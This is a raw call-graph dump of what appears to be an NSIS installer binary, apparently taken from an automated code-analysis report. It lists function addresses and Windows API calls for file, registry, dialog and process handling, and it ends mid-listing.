lstrcpynW 3307->3345 3309 405c36 3310 405bc8 4 API calls 3309->3310 3311 405c3c 3310->3311 3312 40597a 3311->3312 3313 4064e0 5 API calls 3311->3313 3312->3271 3312->3272 3319 405c4c 3313->3319 3314 405c7d lstrlenW 3315 405c88 3314->3315 3314->3319 3317 405b1d 3 API calls 3315->3317 3316 40658f 2 API calls 3316->3319 3318 405c8d GetFileAttributesW 3317->3318 3318->3312 3319->3312 3319->3314 3319->3316 3320 405b69 2 API calls 3319->3320 3320->3314 3321->3275 3323 405b77 3322->3323 3324 405b89 3323->3324 3325 405b7d CharPrevW 3323->3325 3324->3279 3325->3323 3325->3324 3326->3292 3346 405d19 GetFileAttributesW 3327->3346 3330 405935 DeleteFileW 3333 40593b 3330->3333 3331 40592d RemoveDirectoryW 3331->3333 3332 40593f 3332->3302 3333->3332 3334 40594b SetFileAttributesW 3333->3334 3334->3332 3336 406033 3335->3336 3337 406026 3335->3337 3336->3302 3349 405e98 3337->3349 3340 405ade 3339->3340 3341 4065a5 FindClose 3339->3341 3340->3276 3340->3285 3341->3340 3343 405ae8 3342->3343 3344 405b39 lstrcatW 3342->3344 3343->3289 3344->3343 3345->3309 3347 40591e 3346->3347 3348 405d2b SetFileAttributesW 3346->3348 3347->3330 3347->3331 3347->3332 3348->3347 3350 405ec8 3349->3350 3351 405eee GetShortPathNameW 3349->3351 3376 405d3e GetFileAttributesW CreateFileW 3350->3376 3353 405f03 3351->3353 3354 40600d 3351->3354 3353->3354 3356 405f0b wsprintfA 3353->3356 3354->3336 3355 405ed2 CloseHandle GetShortPathNameW 3355->3354 3357 405ee6 3355->3357 3358 40626e 17 API calls 3356->3358 3357->3351 3357->3354 3359 405f33 3358->3359 3377 405d3e GetFileAttributesW CreateFileW 3359->3377 3361 405f40 3361->3354 3362 405f4f GetFileSize GlobalAlloc 3361->3362 3363 405f71 3362->3363 3364 406006 CloseHandle 3362->3364 3378 405dc1 ReadFile 3363->3378 3364->3354 3369 405f90 lstrcpyA 3372 405fb2 3369->3372 3370 405fa4 3371 405ca3 4 API calls 3370->3371 3371->3372 3373 405fe9 SetFilePointer 3372->3373 3385 405df0 WriteFile 3373->3385 3376->3355 3377->3361 3379 405ddf 3378->3379 3379->3364 3380 405ca3 lstrlenA 3379->3380 3381 405ce4 lstrlenA 3380->3381 3382 405cec 3381->3382 3383 405cbd lstrcmpiA 3381->3383 3382->3369 3382->3370 3383->3382 3384 405cdb CharNextA 3383->3384 3384->3381 3386 405e0e GlobalFree 3385->3386 3386->3364 3397 401e43 3405 402c15 3397->3405 3399 401e49 3400 402c15 17 API calls 3399->3400 3401 401e55 3400->3401 3402 401e61 ShowWindow 3401->3402 3403 401e6c EnableWindow 3401->3403 3404 402abf 3402->3404 3403->3404 3406 40626e 17 API calls 3405->3406 3407 402c2a 3406->3407 3407->3399 4067 402644 4068 402c15 17 API calls 4067->4068 4075 402653 4068->4075 4069 402790 4070 40269d ReadFile 4070->4069 4070->4075 4071 405dc1 ReadFile 4071->4075 4072 402792 4089 406193 wsprintfW 4072->4089 4073 4026dd MultiByteToWideChar 4073->4075 4075->4069 4075->4070 4075->4071 4075->4072 4075->4073 4077 402703 SetFilePointer MultiByteToWideChar 4075->4077 4079 4027a3 4075->4079 4080 405e1f SetFilePointer 4075->4080 4077->4075 4078 4027c4 SetFilePointer 4078->4069 4079->4069 4079->4078 4081 405e3b 4080->4081 4088 405e57 4080->4088 4082 405dc1 ReadFile 4081->4082 4083 405e47 4082->4083 4084 405e60 SetFilePointer 4083->4084 4085 405e88 SetFilePointer 4083->4085 4083->4088 4084->4085 4086 405e6b 4084->4086 4085->4088 4087 405df0 WriteFile 4086->4087 4087->4088 4088->4075 4089->4069 3422 402348 3423 402c37 17 API calls 3422->3423 3424 402357 3423->3424 3425 402c37 17 API calls 3424->3425 3426 402360 3425->3426 3427 402c37 17 API calls 3426->3427 3428 40236a GetPrivateProfileStringW 3427->3428 3570 4014cb 3571 4052b0 24 API calls 3570->3571 3572 4014d2 3571->3572 4097 4016cc 4098 402c37 17 API calls 4097->4098 4099 4016d2 GetFullPathNameW 4098->4099 4100 40170e 4099->4100 4101 4016ec 4099->4101 4102 401723 GetShortPathNameW 4100->4102 4103 402abf 4100->4103 4101->4100 4104 40658f 2 API calls 4101->4104 4102->4103 4105 4016fe 4104->4105 4105->4100 4107 40624c lstrcpynW 4105->4107 4107->4100 4108 401b4d 4109 402c37 17 API calls 4108->4109 4110 401b54 4109->4110 4111 402c15 17 API calls 4110->4111 4112 401b5d wsprintfW 4111->4112 4113 402abf 4112->4113 4114 401f52 4115 402c37 17 API calls 4114->4115 4116 401f59 4115->4116 4117 40658f 2 API calls 4116->4117 4118 401f5f 4117->4118 4120 401f70 4118->4120 4121 406193 wsprintfW 4118->4121 4121->4120 4122 402253 4123 402c37 17 API calls 4122->4123 4124 402259 4123->4124 4125 402c37 17 API calls 4124->4125 4126 402262 4125->4126 4127 402c37 17 API calls 4126->4127 4128 40226b 4127->4128 4129 40658f 2 API calls 4128->4129 4130 402274 4129->4130 4131 402285 lstrlenW lstrlenW 4130->4131 4135 402278 4130->4135 4133 4052b0 24 API calls 4131->4133 4132 4052b0 24 API calls 4136 402280 4132->4136 4134 4022c3 SHFileOperationW 4133->4134 4134->4135 4134->4136 4135->4132 4135->4136 4137 401956 4138 402c37 17 API calls 4137->4138 4139 40195d lstrlenW 4138->4139 4140 40258c 4139->4140 4141 406956 4142 4067da 4141->4142 4143 407145 4142->4143 4144 406864 GlobalAlloc 4142->4144 4145 40685b GlobalFree 4142->4145 4146 4068d2 GlobalFree 4142->4146 4147 4068db GlobalAlloc 4142->4147 4144->4142 4144->4143 4145->4144 4146->4147 4147->4142 4147->4143 4148 401d57 GetDlgItem GetClientRect 4149 402c37 17 API calls 4148->4149 4150 401d89 LoadImageW SendMessageW 4149->4150 4151 401da7 DeleteObject 4150->4151 4152 402abf 4150->4152 4151->4152 4153 402dd7 4154 402de9 SetTimer 4153->4154 4156 402e02 4153->4156 4154->4156 4155 402e57 4156->4155 4157 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4156->4157 4157->4155 4158 4014d7 4159 402c15 17 API calls 4158->4159 4160 4014dd Sleep 4159->4160 4162 402abf 4160->4162 4163 4022d7 4164 4022de 4163->4164 4167 4022f1 4163->4167 4165 40626e 17 API calls 4164->4165 4166 4022eb 4165->4166 4168 4058ae MessageBoxIndirectW 4166->4168 4168->4167 4169 40175c 4170 402c37 17 API calls 4169->4170 4171 401763 4170->4171 4172 405d6d 2 API calls 4171->4172 4173 40176a 4172->4173 4173->4173 4014 4023de 4015 402c37 17 API calls 4014->4015 4016 4023f0 4015->4016 4017 402c37 17 API calls 4016->4017 4018 4023fa 4017->4018 4031 402cc7 4018->4031 4021 402885 4022 402432 4024 40243e 4022->4024 4026 402c15 17 API calls 4022->4026 4023 402c37 17 API calls 4025 402428 lstrlenW 4023->4025 4027 40245d RegSetValueExW 4024->4027 4028 4030fa 35 API calls 4024->4028 4025->4022 4026->4024 4029 402473 RegCloseKey 4027->4029 4028->4027 4029->4021 4032 402ce2 4031->4032 4035 4060e7 4032->4035 4036 4060f6 4035->4036 4037 406101 RegCreateKeyExW 4036->4037 4038 40240a 4036->4038 4037->4038 4038->4021 4038->4022 4038->4023 3387 402862 3388 402c37 17 API calls 3387->3388 3389 402869 FindFirstFileW 3388->3389 3390 402891 3389->3390 3391 40287c 3389->3391 3395 406193 wsprintfW 3390->3395 3393 40289a 3396 40624c lstrcpynW 3393->3396 3395->3393 3396->3391 4181 401563 4182 402a65 4181->4182 4185 406193 wsprintfW 4182->4185 4184 402a6a 4185->4184 4186 401968 4187 402c15 17 API calls 4186->4187 4188 40196f 4187->4188 4189 402c15 17 API calls 4188->4189 4190 40197c 4189->4190 4191 402c37 17 API calls 4190->4191 4192 401993 lstrlenW 4191->4192 4193 4019a4 4192->4193 4194 4019e5 4193->4194 4198 40624c lstrcpynW 4193->4198 4196 4019d5 4196->4194 4197 4019da lstrlenW 4196->4197 4197->4194 4198->4196 4199 404669 4200 404679 4199->4200 4201 40469f 4199->4201 4202 4041e1 18 API calls 4200->4202 4203 404248 8 API calls 4201->4203 4204 404686 SetDlgItemTextW 4202->4204 4205 4046ab 4203->4205 4204->4201 4206 4027e9 4207 4027f0 4206->4207 4208 402a6a 4206->4208 4209 402c15 17 API calls 4207->4209 4210 4027f7 4209->4210 4211 402806 SetFilePointer 4210->4211 4211->4208 4212 402816 4211->4212 4214 406193 wsprintfW 4212->4214 4214->4208 4215 40166a 4216 402c37 17 API calls 4215->4216 4217 401670 4216->4217 4218 40658f 2 API calls 4217->4218 4219 401676 4218->4219 4220 401ced 4221 402c15 17 API calls 4220->4221 4222 401cf3 IsWindow 4221->4222 4223 401a20 4222->4223 3596 4053ef 3597 405410 GetDlgItem GetDlgItem GetDlgItem 3596->3597 3598 405599 3596->3598 3641 404216 SendMessageW 3597->3641 3600 4055a2 GetDlgItem CreateThread CloseHandle 3598->3600 3601 4055ca 3598->3601 3600->3601 3644 405383 OleInitialize 3600->3644 3603 4055f5 3601->3603 3604 4055e1 ShowWindow ShowWindow 3601->3604 3605 40561a 3601->3605 3602 405480 3607 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3602->3607 3606 405655 3603->3606 3609 405609 3603->3609 3610 40562f ShowWindow 3603->3610 3643 404216 SendMessageW 3604->3643 3611 404248 8 API calls 3605->3611 3606->3605 3616 405663 SendMessageW 3606->3616 3614 4054f5 3607->3614 3615 4054d9 SendMessageW SendMessageW 3607->3615 3617 4041ba SendMessageW 3609->3617 3612 405641 3610->3612 3613 40564f 3610->3613 3622 405628 3611->3622 3618 4052b0 24 API calls 3612->3618 3619 4041ba SendMessageW 3613->3619 3620 405508 3614->3620 3621 4054fa SendMessageW 3614->3621 3615->3614 3616->3622 3623 40567c CreatePopupMenu 3616->3623 3617->3605 3618->3613 3619->3606 3625 4041e1 18 API calls 3620->3625 3621->3620 3624 40626e 17 API calls 3623->3624 3626 40568c AppendMenuW 3624->3626 3627 405518 3625->3627 3628 4056a9 GetWindowRect 3626->3628 3629 4056bc TrackPopupMenu 3626->3629 3630 405521 ShowWindow 3627->3630 3631 405555 GetDlgItem SendMessageW 3627->3631 3628->3629 3629->3622 3633 4056d7 3629->3633 3634 405544 3630->3634 3635 405537 ShowWindow 3630->3635 3631->3622 3632 40557c SendMessageW SendMessageW 3631->3632 3632->3622 3636 4056f3 SendMessageW 3633->3636 3642 404216 SendMessageW 3634->3642 3635->3634 3636->3636 3637 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3636->3637 3639 405735 SendMessageW 3637->3639 3639->3639 3640 40575e GlobalUnlock SetClipboardData CloseClipboard 3639->3640 3640->3622 3641->3602 3642->3631 3643->3603 3645 40422d SendMessageW 3644->3645 3648 4053a6 3645->3648 3646 4053cd 3647 40422d SendMessageW 3646->3647 3649 4053df CoUninitialize 3647->3649 3648->3646 3650 401389 2 API calls 3648->3650 3650->3648 3651 40176f 3652 402c37 17 API calls 3651->3652 3653 401776 3652->3653 3654 401796 3653->3654 3655 40179e 3653->3655 3711 40624c lstrcpynW 3654->3711 3712 40624c lstrcpynW 3655->3712 3658 40179c 3662 4064e0 5 API calls 3658->3662 3659 4017a9 3660 405b1d 3 API calls 3659->3660 3661 4017af lstrcatW 3660->3661 3661->3658 3673 4017bb 3662->3673 3663 40658f 2 API calls 3663->3673 3664 405d19 2 API calls 3664->3673 3666 4017cd CompareFileTime 3666->3673 3667 40188d 3668 4052b0 24 API calls 3667->3668 3671 401897 3668->3671 3669 4052b0 24 API calls 3677 401879 3669->3677 3670 40624c lstrcpynW 3670->3673 3690 4030fa 3671->3690 3673->3663 3673->3664 3673->3666 3673->3667 3673->3670 3678 40626e 17 API calls 3673->3678 3687 401864 3673->3687 3689 405d3e GetFileAttributesW CreateFileW 3673->3689 3713 4058ae 3673->3713 3675 4018be SetFileTime 3676 4018d0 CloseHandle 3675->3676 3676->3677 3679 4018e1 3676->3679 3678->3673 3680 4018e6 3679->3680 3681 4018f9 3679->3681 3682 40626e 17 API calls 3680->3682 3683 40626e 17 API calls 3681->3683 3685 4018ee lstrcatW 3682->3685 3686 401901 3683->3686 3685->3686 3688 4058ae MessageBoxIndirectW 3686->3688 3687->3669 3687->3677 3688->3677 3689->3673 3691 403113 3690->3691 3692 40313e 3691->3692 3727 4032f5 SetFilePointer 3691->3727 3717 4032df 3692->3717 3696 40315b GetTickCount 3707 40316e 3696->3707 3697 40327f 3698 403283 3697->3698 3702 40329b 3697->3702 3700 4032df ReadFile 3698->3700 3699 4018aa 3699->3675 3699->3676 3700->3699 3701 4032df ReadFile 3701->3702 3702->3699 3702->3701 3704 405df0 WriteFile 3702->3704 3703 4032df ReadFile 3703->3707 3704->3702 3706 4031d4 GetTickCount 3706->3707 3707->3699 3707->3703 3707->3706 3708 4031fd MulDiv wsprintfW 3707->3708 3710 405df0 WriteFile 3707->3710 3720 4067a7 3707->3720 3709 4052b0 24 API calls 3708->3709 3709->3707 3710->3707 3711->3658 3712->3659 3714 4058c3 3713->3714 3715 40590f 3714->3715 3716 4058d7 MessageBoxIndirectW 3714->3716 3715->3673 3716->3715 3718 405dc1 ReadFile 3717->3718 3719 403149 3718->3719 3719->3696 3719->3697 3719->3699 3721 4067cc 3720->3721 3722 4067d4 3720->3722 3721->3707 3722->3721 3723 406864 GlobalAlloc 3722->3723 3724 40685b GlobalFree 3722->3724 3725 4068d2 GlobalFree 3722->3725 3726 4068db GlobalAlloc 3722->3726 3723->3721 3723->3722 3724->3723 3725->3726 3726->3721 3726->3722 3727->3692 4224 402570 4225 402c37 17 API calls 4224->4225 4226 402577 4225->4226 4229 405d3e GetFileAttributesW CreateFileW 4226->4229 4228 402583 4229->4228 4230 401b71 4231 401bc2 4230->4231 4232 401b7e 4230->4232 4233 401bc7 4231->4233 4234 401bec GlobalAlloc 4231->4234 4235 4022de 4232->4235 4240 401b95 4232->4240 4243 401c07 4233->4243 4251 40624c lstrcpynW 4233->4251 4236 40626e 17 API calls 4234->4236 4237 40626e 17 API calls 4235->4237 4236->4243 4239 4022eb 4237->4239 4245 4058ae MessageBoxIndirectW 4239->4245 4249 40624c lstrcpynW 4240->4249 4241 401bd9 GlobalFree 4241->4243 4244 401ba4 4250 40624c lstrcpynW 4244->4250 4245->4243 4247 401bb3 4252 40624c lstrcpynW 4247->4252 4249->4244 4250->4247 4251->4241 4252->4243 3728 4024f2 3729 402c77 17 API calls 3728->3729 3730 4024fc 3729->3730 3731 402c15 17 API calls 3730->3731 3732 402505 3731->3732 3733 402521 RegEnumKeyW 3732->3733 3734 40252d RegEnumValueW 3732->3734 3737 402885 3732->3737 3735 402549 RegCloseKey 3733->3735 3734->3735 3736 402542 3734->3736 3735->3737 3736->3735 4253 401a72 4254 402c15 17 API calls 4253->4254 4255 401a78 4254->4255 4256 402c15 17 API calls 4255->4256 4257 401a20 4256->4257 3739 401573 3740 401583 ShowWindow 3739->3740 3741 40158c 3739->3741 3740->3741 3742 40159a ShowWindow 3741->3742 3743 402abf 3741->3743 3742->3743 4258 4042f5 lstrcpynW lstrlenW 4259 4014f5 SetForegroundWindow 4260 402abf 4259->4260 4268 401e77 4269 402c37 17 API calls 4268->4269 4270 401e7d 4269->4270 4271 402c37 17 API calls 4270->4271 4272 401e86 4271->4272 4273 402c37 17 API calls 4272->4273 4274 401e8f 4273->4274 4275 402c37 17 API calls 4274->4275 4276 401e98 4275->4276 4277 401423 24 API calls 4276->4277 4278 401e9f 4277->4278 4285 405874 ShellExecuteExW 4278->4285 4280 401ee1 4281 4066d7 5 API calls 4280->4281 4283 402885 4280->4283 4282 401efb CloseHandle 4281->4282 4282->4283 4285->4280 3766 40167b 3767 402c37 17 API calls 3766->3767 3768 401682 3767->3768 3769 402c37 17 API calls 3768->3769 3770 40168b 3769->3770 3771 402c37 17 API calls 3770->3771 3772 401694 MoveFileW 3771->3772 3773 4016a0 3772->3773 3774 4016a7 3772->3774 3776 401423 24 API calls 3773->3776 3775 40658f 2 API calls 3774->3775 3778 40224a 3774->3778 3777 4016b6 3775->3777 3776->3778 3777->3778 3779 406012 36 API calls 3777->3779 3779->3773 4039 4020fe 4040 402c37 17 API calls 4039->4040 4041 402105 4040->4041 4042 402c37 17 API calls 4041->4042 4043 40210f 4042->4043 4044 402c37 17 API calls 4043->4044 4045 402119 4044->4045 4046 402c37 17 API calls 4045->4046 4047 402123 4046->4047 4048 402c37 17 API calls 4047->4048 4049 40212d 4048->4049 4050 40216c CoCreateInstance 4049->4050 4051 402c37 17 API calls 4049->4051 4054 40218b 4050->4054 4051->4050 4052 401423 24 API calls 4053 40224a 4052->4053 4054->4052 4054->4053 4055 40247e 4056 402c77 17 API calls 4055->4056 4057 402488 4056->4057 4058 402c37 17 API calls 4057->4058 4059 402491 4058->4059 4060 40249c RegQueryValueExW 4059->4060 4064 402885 4059->4064 4061 4024c2 RegCloseKey 4060->4061 4062 4024bc 4060->4062 4061->4064 4062->4061 4066 406193 wsprintfW 4062->4066 4066->4061 4286 40437e 4287 404396 4286->4287 4289 4044b0 4286->4289 4292 4041e1 18 API calls 4287->4292 4288 40451a 4290 4045e4 4288->4290 4291 404524 GetDlgItem 4288->4291 4289->4288 4289->4290 4297 4044eb GetDlgItem SendMessageW 4289->4297 4296 404248 8 API calls 4290->4296 4293 4045a5 4291->4293 4294 40453e 4291->4294 4295 4043fd 4292->4295 4293->4290 4300 4045b7 4293->4300 4294->4293 4299 404564 SendMessageW LoadCursorW SetCursor 4294->4299 4298 4041e1 18 API calls 4295->4298 4311 4045df 4296->4311 4319 404203 KiUserCallbackDispatcher 4297->4319 4303 40440a CheckDlgButton 4298->4303 4323 40462d 4299->4323 4305 4045cd 4300->4305 4306 4045bd SendMessageW 4300->4306 4302 404515 4320 404609 4302->4320 4317 404203 KiUserCallbackDispatcher 4303->4317 4310 4045d3 SendMessageW 4305->4310 4305->4311 4306->4305 4310->4311 4312 404428 GetDlgItem 4318 404216 SendMessageW 4312->4318 4314 40443e SendMessageW 4315 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4314->4315 4316 40445b GetSysColor 4314->4316 4315->4311 4316->4315 4317->4312 4318->4314 4319->4302 4321 404617 4320->4321 4322 40461c SendMessageW 4320->4322 4321->4322 4322->4288 4326 405874 ShellExecuteExW 4323->4326 4325 404593 LoadCursorW SetCursor 4325->4293 4326->4325 4327 4019ff 4328 402c37 17 API calls 4327->4328 4329 401a06 4328->4329 4330 402c37 17 API calls 4329->4330 4331 401a0f 4330->4331 4332 401a16 lstrcmpiW 4331->4332 4333 401a28 lstrcmpW 4331->4333 4334 401a1c 4332->4334 4333->4334 3125 401f00 3140 402c37 3125->3140 3132 402885 3135 401f2b 3136 401f30 3135->3136 3137 401f3b 3135->3137 3165 406193 wsprintfW 3136->3165 3139 401f39 CloseHandle 3137->3139 3139->3132 3141 402c43 3140->3141 3166 40626e 3141->3166 3144 401f06 3146 4052b0 3144->3146 3147 4052cb 3146->3147 3148 401f10 3146->3148 3149 4052e7 lstrlenW 3147->3149 3150 40626e 17 API calls 3147->3150 3157 405831 CreateProcessW 3148->3157 3151 405310 3149->3151 3152 4052f5 lstrlenW 3149->3152 3150->3149 3154 405323 3151->3154 3155 405316 SetWindowTextW 3151->3155 3152->3148 3153 405307 lstrcatW 3152->3153 3153->3151 3154->3148 3156 405329 SendMessageW SendMessageW SendMessageW 3154->3156 3155->3154 3156->3148 3158 401f16 3157->3158 3159 405864 CloseHandle 3157->3159 3158->3132 3158->3139 3160 4066d7 WaitForSingleObject 3158->3160 3159->3158 3161 4066f1 3160->3161 3162 406703 GetExitCodeProcess 3161->3162 3208 406662 3161->3208 3162->3135 3165->3139 3170 40627b 3166->3170 3167 4064c6 3168 402c64 3167->3168 3199 40624c lstrcpynW 3167->3199 3168->3144 3183 4064e0 3168->3183 3170->3167 3171 406494 lstrlenW 3170->3171 3172 40626e 10 API calls 3170->3172 3176 4063a9 GetSystemDirectoryW 3170->3176 3177 4063bc GetWindowsDirectoryW 3170->3177 3178 4064e0 5 API calls 3170->3178 3179 40626e 10 API calls 3170->3179 3180 406437 lstrcatW 3170->3180 3181 4063f0 SHGetSpecialFolderLocation 3170->3181 3192 40611a 3170->3192 3197 406193 wsprintfW 3170->3197 3198 40624c lstrcpynW 3170->3198 3171->3170 3172->3171 3176->3170 3177->3170 3178->3170 3179->3170 3180->3170 3181->3170 3182 406408 SHGetPathFromIDListW CoTaskMemFree 3181->3182 3182->3170 3189 4064ed 3183->3189 3184 406563 3185 406568 CharPrevW 3184->3185 3188 406589 3184->3188 3185->3184 3186 406556 CharNextW 3186->3184 3186->3189 3188->3144 3189->3184 3189->3186 3190 406542 CharNextW 3189->3190 3191 406551 CharNextW 3189->3191 3204 405b4a 3189->3204 3190->3189 3191->3186 3200 4060b9 3192->3200 3195 40617e 3195->3170 3196 40614e RegQueryValueExW RegCloseKey 3196->3195 3197->3170 3198->3170 3199->3168 3201 4060c8 3200->3201 3202 4060d1 RegOpenKeyExW 3201->3202 3203 4060cc 3201->3203 3202->3203 3203->3195 3203->3196 3205 405b50 3204->3205 3206 405b66 3205->3206 3207 405b57 CharNextW 3205->3207 3206->3189 3207->3205 3209 40667f PeekMessageW 3208->3209 3210 406675 DispatchMessageW 3209->3210 3211 40668f WaitForSingleObject 3209->3211 3210->3209 3211->3161 4335 401000 4336 401037 BeginPaint GetClientRect 4335->4336 4337 40100c DefWindowProcW 4335->4337 4339 4010f3 4336->4339 4340 401179 4337->4340 4341 401073 CreateBrushIndirect FillRect DeleteObject 4339->4341 4342 4010fc 4339->4342 4341->4339 4343 401102 CreateFontIndirectW 4342->4343 4344 401167 EndPaint 4342->4344 4343->4344 4345 401112 6 API calls 4343->4345 4344->4340 4345->4344 4346 401503 4347 40150b 4346->4347 4349 40151e 4346->4349 4348 402c15 17 API calls 4347->4348 4348->4349 3412 402306 3413 40230e 3412->3413 3415 402314 3412->3415 3414 402c37 17 API calls 3413->3414 3414->3415 3416 402c37 17 API calls 3415->3416 3418 402322 3415->3418 3416->3418 3417 402330 3420 402c37 17 API calls 3417->3420 3418->3417 3419 402c37 17 API calls 3418->3419 3419->3417 3421 402339 WritePrivateProfileStringW 3420->3421 4350 404a06 4351 404a32 4350->4351 4352 404a16 4350->4352 4354 404a65 4351->4354 4355 404a38 SHGetPathFromIDListW 4351->4355 4361 405892 GetDlgItemTextW 4352->4361 4357 404a4f SendMessageW 4355->4357 4358 404a48 4355->4358 4356 404a23 SendMessageW 4356->4351 4357->4354 4359 40140b 2 API calls 4358->4359 4359->4357 4361->4356 4362 401f86 4363 402c37 17 API calls 4362->4363 4364 401f8d 4363->4364 4365 406626 5 API calls 4364->4365 4366 401f9c 4365->4366 4367 401fb8 GlobalAlloc 4366->4367 4368 402020 4366->4368 4367->4368 4369 401fcc 4367->4369 4370 406626 5 API calls 4369->4370 4371 401fd3 4370->4371 4372 406626 5 API calls 4371->4372 4373 401fdd 4372->4373 4373->4368 4377 406193 wsprintfW 4373->4377 4375 402012 4378 406193 wsprintfW 4375->4378 4377->4375 4378->4368 3429 403d08 3430 403d20 3429->3430 3431 403e5b 3429->3431 3430->3431 3433 403d2c 3430->3433 3432 403e6c GetDlgItem GetDlgItem 3431->3432 3437 403eac 3431->3437 3436 4041e1 18 API calls 3432->3436 3434 403d37 SetWindowPos 3433->3434 3435 403d4a 3433->3435 3434->3435 3439 403d67 3435->3439 3440 403d4f ShowWindow 3435->3440 3441 403e96 SetClassLongW 3436->3441 3438 403f06 3437->3438 3446 401389 2 API calls 3437->3446 3447 403e56 3438->3447 3500 40422d 3438->3500 3443 403d89 3439->3443 3444 403d6f DestroyWindow 3439->3444 3440->3439 3445 40140b 2 API calls 3441->3445 3449 403d8e SetWindowLongW 3443->3449 3450 403d9f 3443->3450 3448 40416a 3444->3448 3445->3437 3451 403ede 3446->3451 3448->3447 3457 40419b ShowWindow 3448->3457 3449->3447 3454 403e48 3450->3454 3455 403dab GetDlgItem 3450->3455 3451->3438 3456 403ee2 SendMessageW 3451->3456 3452 40140b 2 API calls 3469 403f18 3452->3469 3453 40416c DestroyWindow EndDialog 3453->3448 3522 404248 3454->3522 3458 403ddb 3455->3458 3459 403dbe SendMessageW IsWindowEnabled 3455->3459 3456->3447 3457->3447 3462 403de8 3458->3462 3463 403dfb 3458->3463 3464 403e2f SendMessageW 3458->3464 3473 403de0 3458->3473 3459->3447 3459->3458 3461 40626e 17 API calls 3461->3469 3462->3464 3462->3473 3466 403e03 3463->3466 3467 403e18 3463->3467 3464->3454 3516 40140b 3466->3516 3471 40140b 2 API calls 3467->3471 3468 403e16 3468->3454 3469->3447 3469->3452 3469->3453 3469->3461 3472 4041e1 18 API calls 3469->3472 3491 4040ac DestroyWindow 3469->3491 3503 4041e1 3469->3503 3474 403e1f 3471->3474 3472->3469 3519 4041ba 3473->3519 3474->3454 3474->3473 3476 403f93 GetDlgItem 3477 403fb0 ShowWindow KiUserCallbackDispatcher 3476->3477 3478 403fa8 3476->3478 3506 404203 KiUserCallbackDispatcher 3477->3506 3478->3477 3480 403fda EnableWindow 3485 403fee 3480->3485 3481 403ff3 GetSystemMenu EnableMenuItem SendMessageW 3482 404023 SendMessageW 3481->3482 3481->3485 3482->3485 3485->3481 3507 404216 SendMessageW 3485->3507 3508 403ce9 3485->3508 3511 40624c lstrcpynW 3485->3511 3487 404052 lstrlenW 3488 40626e 17 API calls 3487->3488 3489 404068 SetWindowTextW 3488->3489 3512 401389 3489->3512 3491->3448 3492 4040c6 CreateDialogParamW 3491->3492 3492->3448 3493 4040f9 3492->3493 3494 4041e1 18 API calls 3493->3494 3495 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 401389 2 API calls 3495->3496 3497 40414a 3496->3497 3497->3447 3498 404152 ShowWindow 3497->3498 3499 40422d SendMessageW 3498->3499 3499->3448 3501 404245 3500->3501 3502 404236 SendMessageW 3500->3502 3501->3469 3502->3501 3504 40626e 17 API calls 3503->3504 3505 4041ec SetDlgItemTextW 3504->3505 3505->3476 3506->3480 3507->3485 3509 40626e 17 API calls 3508->3509 3510 403cf7 SetWindowTextW 3509->3510 3510->3485 3511->3487 3514 401390 3512->3514 3513 4013fe 3513->3469 3514->3513 3515 4013cb MulDiv SendMessageW 3514->3515 3515->3514 3517 401389 2 API calls 3516->3517 3518 401420 3517->3518 3518->3473 3520 4041c1 3519->3520 3521 4041c7 SendMessageW 3519->3521 3520->3521 3521->3468 3523 404260 GetWindowLongW 3522->3523 3533 4042e9 3522->3533 3524 404271 3523->3524 3523->3533 3525 404280 GetSysColor 3524->3525 3526 404283 3524->3526 3525->3526 3527 404293 SetBkMode 3526->3527 3528 404289 SetTextColor 3526->3528 3529 4042b1 3527->3529 3530 4042ab GetSysColor 3527->3530 3528->3527 3531 4042c2 3529->3531 3532 4042b8 SetBkColor 3529->3532 3530->3529 3531->3533 3534 4042d5 DeleteObject 3531->3534 3535 4042dc CreateBrushIndirect 3531->3535 3532->3531 3533->3447 3534->3535 3535->3533 3536 402388 3537 402390 3536->3537 3538 4023bb 3536->3538 3548 402c77 3537->3548 3540 402c37 17 API calls 3538->3540 3541 4023c2 3540->3541 3553 402cf5 3541->3553 3544 4023a1 3546 402c37 17 API calls 3544->3546 3545 4023cf 3547 4023a8 RegDeleteValueW RegCloseKey 3546->3547 3547->3545 3549 402c37 17 API calls 3548->3549 3550 402c8e 3549->3550 3551 4060b9 RegOpenKeyExW 3550->3551 3552 402397 3551->3552 3552->3544 3552->3545 3554 402d0b 3553->3554 3555 402d21 3554->3555 3557 402d2a 3554->3557 3555->3545 3558 4060b9 RegOpenKeyExW 3557->3558 3559 402d58 3558->3559 3560 402dd0 3559->3560 3561 402d5c 3559->3561 3560->3555 3562 402d7e RegEnumKeyW 3561->3562 3563 402d95 RegCloseKey 3561->3563 3564 402db6 RegCloseKey 3561->3564 3566 402d2a 6 API calls 3561->3566 3562->3561 3562->3563 3565 406626 5 API calls 3563->3565 3564->3560 3567 402da5 3565->3567 3566->3561 3568 402dc4 RegDeleteKeyW 3567->3568 3569 402da9 3567->3569 3568->3560 3569->3560 4386 40190c 4387 401943 4386->4387 4388 402c37 17 API calls 4387->4388 4389 401948 4388->4389 4390 40595a 67 API calls 4389->4390 4391 401951 4390->4391 4399 401d0e 4400 402c15 17 API calls 4399->4400 4401 401d15 4400->4401 4402 402c15 17 API calls 4401->4402 4403 401d21 GetDlgItem 4402->4403 4404 40258c 4403->4404 4405 40298e 4406 402c15 17 API calls 4405->4406 4407 4029a8 4406->4407 4408 4029e8 4407->4408 4409 4029cf 4407->4409 4415 402885 4407->4415 4412 402a02 4408->4412 4413 4029f2 4408->4413 4410 4029d4 4409->4410 4411 4029e5 4409->4411 4419 40624c lstrcpynW 4410->4419 4411->4415 4420 406193 wsprintfW 4411->4420 4414 40626e 17 API calls 4412->4414 4416 402c15 17 API calls 4413->4416 4414->4411 4416->4411 4419->4415 4420->4415 4421 40190f 4422 402c37 17 API calls 4421->4422 4423 401916 4422->4423 4424 4058ae MessageBoxIndirectW 4423->4424 4425 40191f 4424->4425 4426 401491 4427 4052b0 24 API calls 4426->4427 4428 401498 4427->4428 4429 402592 4430 4025c1 4429->4430 4431 4025a6 4429->4431 4433 4025f5 4430->4433 4434 4025c6 4430->4434 4432 402c15 17 API calls 4431->4432 4435 4025ad 4432->4435 4437 402c37 17 API calls 4433->4437 4436 402c37 17 API calls 4434->4436 4440 402629 4435->4440 4442 405e1f 5 API calls 4435->4442 4443 40263f 4435->4443 4438 4025cd WideCharToMultiByte lstrlenA 4436->4438 4439 4025fc lstrlenW 